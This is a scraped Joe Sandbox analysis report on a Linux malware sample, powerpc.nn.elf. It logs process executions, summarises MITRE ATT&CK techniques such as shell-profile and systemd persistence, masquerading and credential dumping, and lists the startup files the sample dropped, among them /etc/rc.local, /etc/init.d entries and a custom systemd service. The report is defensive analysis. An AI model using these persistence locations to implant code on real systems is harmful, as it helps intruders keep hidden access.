Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:13:51
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:13:52
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:13:52
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report powerpc.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/powerpc.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.b58Zav (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: dash PID: 6186, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6186, Parent PID: 4331

General

Chronological Activities

Analysis Process: dash PID: 6187, Parent PID: 4331

Linux Analysis Report
powerpc.nn.elf